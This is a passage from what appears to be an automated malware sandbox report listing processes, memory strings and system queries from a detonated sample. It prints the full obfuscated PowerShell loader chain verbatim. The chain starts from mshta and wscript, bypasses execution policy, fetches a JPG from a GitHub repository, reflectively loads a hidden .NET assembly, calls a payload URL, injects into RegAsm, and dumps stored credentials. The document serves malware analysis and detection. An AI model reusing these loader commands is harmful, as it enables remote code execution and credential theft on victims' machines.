I='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.ExeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfo4viagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelxrzcgugicagicagicagicagicagicagicagicagicagicagic1tru1crvjerwzjtmluaw9uicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtu9olmrmtcisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbrrljjt2lctcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig9dwwksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbvcuxvwvasdwludcagicagicagicagicagicagicagicagicagicagicagtur1anzlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagienjww9nv3rnzxipoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaicxjva0nttxzhtkgiicagicagicagicagicagicagicagicagicagicagicatbmfnzvnwqunficagicagicagicagicagicagicagicagicagicagicbyzejmqnd6u21nzsagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfo4vjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewny4xnzuumji5ljezoc81ntavc2vldghlymvzdhbpy3r1cmv3axroz3jlyxr0agluz3npbmxpbmvhbhdhexmudelgiiwijevudjpbufbeqvrbxhnlzxrozwjlc3rwawn0dxjld2l0agdyzwf0dghpbmdzaw5saw5lys52ylmildasmck7c1rhcnqtu0xfzvaomyk7u3rhclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2vldghlymvzdhbpy3r1cmv3axroz3jlyxr0agluz3npbmxpbmvhlnziuyi='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjfnoruxmswrbmv0rjhnorwxmsurbmtndkydyjykoicgoj3sxfwltywdlvxjsid0gezb9ahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl0nyexb0zxjzqw5kvg9vbhnpzicrj2ljawfsl1pjuc9yzwzzl2hlywrzl21haw4vrgv0ywhob3rlx1yuanbnihswftt7mx13zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3snkycxfwltywdlqnl0zxmgpsb7mx0nkyd3zwjdbgllbnqurg8nkyd3bmxvywreyxrhkhsxfwltywdlvxjsktt7mx1pbwfnzvrlehqgpsbbuycrj3lzdgvtllrlehqurw5jbycrj2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7mx1zdgfydezsywcgpsb7mh08pejbu0u2nf9tvefsvccrjz4+ezb9o3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwknkydtywdlvgv4dc5jbmrljysneccrj09mkhsxfwvujysnzezsywcpo3sxfxn0yxj0sw5kzxgglwdlidaglwfuzcb7mx1lbmrjbmrlecatzycrj3qnkycgezf9cycrj3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7ezf9ymfzzty0tgvuz3roid0gezf9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnkyd7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev0nkyc6okxvywqoezf9y29tbwfuzej5dgvzkscrjzt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkludm9rzsh7mx1udwxslcbakhswfxr4dc5srendtk0vmdu1lzgzms45mjiuntcxljcwms8vonb0dgh7mh0sihswfwrlcycrj2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mccrj30sihswfwrlc2f0axzhzg97mh0sihswfvjlz0fzbscrj3swfswgezb9zgvzyxrpdmfkb3swfswgezb9zgvzyxrpdmfkb3swfskpoycpicatrltjaefsxtm5lftjaefsxtm2ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x')( (('{1}imageurl = {0}https://raw.githubusercontent.com/cryptersandtoolsof'+'icial/zip/refs/heads/main/detahnote_v.jpg {0};{1}webclient = new-object system.net.webclient;{'+'1}imagebytes = {1}'+'webclient.do'+'wnloaddata({1}imageurl);{1}imagetext = [s'+'ystem.text.enco'+'ding]::utf8.getstring({1}imagebytes);{1}startflag = {0}<<base64_start'+'>>{0};{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}i'+'magetext.inde'+'x'+'of({1}en'+'dflag);{1}startindex -ge 0 -and {1}endindex -g'+'t'+' {1}s'+'tartindex;{1}startindex += {1}startflag.length;{1}base64length = {1}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes = [system.convert]::frombase64string('+'{1}base64command);{1}loadedassembly = [system.reflection.assembly]'+'::load({1}commandbytes)'+';{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.invoke({1}null, @({0}txt.rdccnm/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}regasm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -f[char]39,[char]36) )"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfo4viagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelxrzcgugicagicagicagicagicagicagicagicagicagicagic1tru1crvjerwzjtmluaw9uicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtu9olmrmtcisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbrrljjt2lctcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig9dwwksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbvcuxvwvasdwludcagicagicagicagicagicagicagicagicagicagicagtur1anzlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagienjww9nv3rnzxipoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaicxjva0nttxzhtkgiicagicagicagicagicagicagicagicagicagicagicatbmfnzvnwqunficagicagicagicagicagicagicagicagicagicagicbyzejmqnd6u21nzsagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfo4vjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewny4xnzuumji5ljezoc81ntavc2vldghlymvzdhbpy3r1cmv3axroz3jlyxr0agluz3npbmxpbmvhbhdhexmudelgiiwijevudjpbufbeqvrbxhnlzxrozwjlc3rwawn0dxjld2l0agdyzwf0dghpbmdzaw5saw5lys52ylmildasmck7c1rhcnqtu0xfzvaomyk7u3rhclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2vldghlymvzdhbpy3r1cmv3axroz3jlyxr0agluz3npbmxpbmvhlnziuyi='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjfnoruxmswrbmv0rjhnorwxmsurbmtndkydyjykoicgoj3sxfwltywdlvxjsid0gezb9ahr0chm6ly9yyxcuz2l0ahvidxnlcmnvbnrlbnquy29tl0nyexb0zxjzqw5kvg9vbhnpzicrj2ljawfsl1pjuc9yzwzzl2hlywrzl21haw4vrgv0ywhob3rlx1yuanbnihswftt7mx13zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3snkycxfwltywdlqnl0zxmgpsb7mx0nkyd3zwjdbgllbnqurg8nkyd3bmxvywreyxrhkhsxfwltywdlvxjsktt7mx1pbwfnzvrlehqgpsbbuycrj3lzdgvtllrlehqurw5jbycrj2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7mx1zdgfydezsywcgpsb7mh08pejbu0u2nf9tvefsvccrjz4+ezb9o3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwknkydtywdlvgv4dc5jbmrljysneccrj09mkhsxfwvujysnzezsywcpo3sxfxn0yxj0sw5kzxgglwdlidaglwfuzcb7mx1lbmrjbmrlecatzycrj3qnkycgezf9cycrj3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7ezf9ymfzzty0tgvuz3roid0gezf9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnkyd7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev0nkyc6okxvywqoezf9y29tbwfuzej5dgvzkscrjzt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkludm9rzsh7mx1udwxslcbakhswfxr4dc5srendtk0vmdu1lzgzms45mjiuntcxljcwms8vonb0dgh7mh0sihswfwrlcycrj2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mccrj30sihswfwrlc2f0axzhzg97mh0sihswfvjlz0fzbscrj3swfswgezb9zgvzyxrpdmfkb3swfswgezb9zgvzyxrpdmfkb3swfskpoycpicatrltjaefsxtm5lftjaefsxtm2ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x')( (('{1}imageurl = {0}https://raw.githubusercontent.com/cryptersandtoolsof'+'icial/zip/refs/heads/main/detahnote_v.jpg {0};{1}webclient = new-object system.net.webclient;{'+'1}imagebytes = {1}'+'webclient.do'+'wnloaddata({1}imageurl);{1}imagetext = [s'+'ystem.text.enco'+'ding]::utf8.getstring({1}imagebytes);{1}startflag = {0}<<base64_start'+'>>{0};{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}i'+'magetext.inde'+'x'+'of({1}en'+'dflag);{1}startindex -ge 0 -and {1}endindex -g'+'t'+' {1}s'+'tartindex;{1}startindex += {1}startflag.length;{1}base64length = {1}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes = [system.convert]::frombase64string('+'{1}base64command);{1}loadedassembly = [system.reflection.assembly]'+'::load({1}commandbytes)'+';{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.invoke({1}null, @({0}txt.rdccnm/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}regasm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -f[char]39,[char]36) )"Jump to behavior
                      Source: RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager(
                      Source: RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4544142973.0000000000AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4544142973.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW8\
                      Source: RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW8\7
                      Source: RegAsm.exe, 0000000B.00000002.4544142973.0000000000AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
                      Source: RegAsm.exe, 0000000B.00000002.4544142973.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW8\*
                      Source: RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: RegAsm.exe, 0000000B.00000002.4544142973.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4543306554.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>
                      Source: RegAsm.exe, 0000000B.00000002.4544142973.0000000000AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<
                      Source: RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.drBinary or memory string: [Program Manager]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434CB6 cpuid 11_2_00434CB6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,11_2_0040F90C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_0045201B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_004520B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_00452393
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00448484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_004525C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_0044896D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00451FD0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
